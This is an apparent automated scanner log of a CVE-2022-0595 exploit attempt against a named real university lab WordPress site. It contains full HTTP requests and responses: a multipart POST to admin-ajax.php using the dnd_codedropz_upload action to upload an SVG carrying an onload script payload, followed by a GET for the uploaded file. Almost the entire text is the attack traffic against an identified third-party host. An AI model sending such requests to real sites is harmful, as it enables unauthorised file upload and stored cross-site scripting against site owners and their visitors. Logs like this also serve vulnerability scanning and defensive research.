[CVE-2022-0595] Dumped HTTP request for https://lecao-lab.science.unimelb.edu.au/wp-admin/admin-ajax.php


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: lecao-lab.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 689
Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161
Accept-Encoding: gzip

-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="size_limit"

10485760
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="type"

click
-----------------------------92633278134516118923780781161
Content-Disposition: form-data; name="upload-file"; filename="30v0w97eZfZECZeUAYDKVD6l6VP.svg"
Content-Type: image/jpeg

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
-----------------------------92633278134516118923780781161--

[CVE-2022-0595] Dumped HTTP response https://lecao-lab.science.unimelb.edu.au/wp-admin/admin-ajax.php

HTTP/1.1 400 Bad Request
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Aug 2025 15:18:03 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: openresty
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Robots-Tag: noindex

0
[CVE-2022-0595] Dumped HTTP request for https://lecao-lab.science.unimelb.edu.au/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/30v0w97eZfZECZeUAYDKVD6l6VP.svg


GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/30v0w97eZfZECZeUAYDKVD6l6VP.svg HTTP/1.1
Host: lecao-lab.science.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[CVE-2022-0595] Dumped HTTP response https://lecao-lab.science.unimelb.edu.au/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/30v0w97eZfZECZeUAYDKVD6l6VP.svg

HTTP/1.1 302 Found
Connection: close
Transfer-Encoding: chunked
Cache-Control: public, max-age=31536000
Content-Type: image/svg
Date: Wed, 06 Aug 2025 15:18:04 GMT
Etag: caadb3b41cb5d4ecf5ba95c9e9f7129d
Location: https://bpb-ap-se2.wpmucdn.com/blogs.unimelb.edu.au/dist/2/277/files/wp_dndcf7_uploads/wpcf7-files/30v0w97eZfZECZeUAYDKVD6l6VP.svg
Server: openresty
Vary: Cookie
X-Cache-Bypass-Reason: 0


